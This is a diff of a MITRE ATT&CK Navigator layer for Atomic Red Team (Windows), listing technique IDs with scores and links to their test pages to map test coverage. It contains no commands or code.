@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T100
3/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,
"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"http
s://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanar
yco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/ato
mic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redca
naryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/
atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.0
01/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":10
0,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://git
hub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/ato
mic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.0
01.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techn
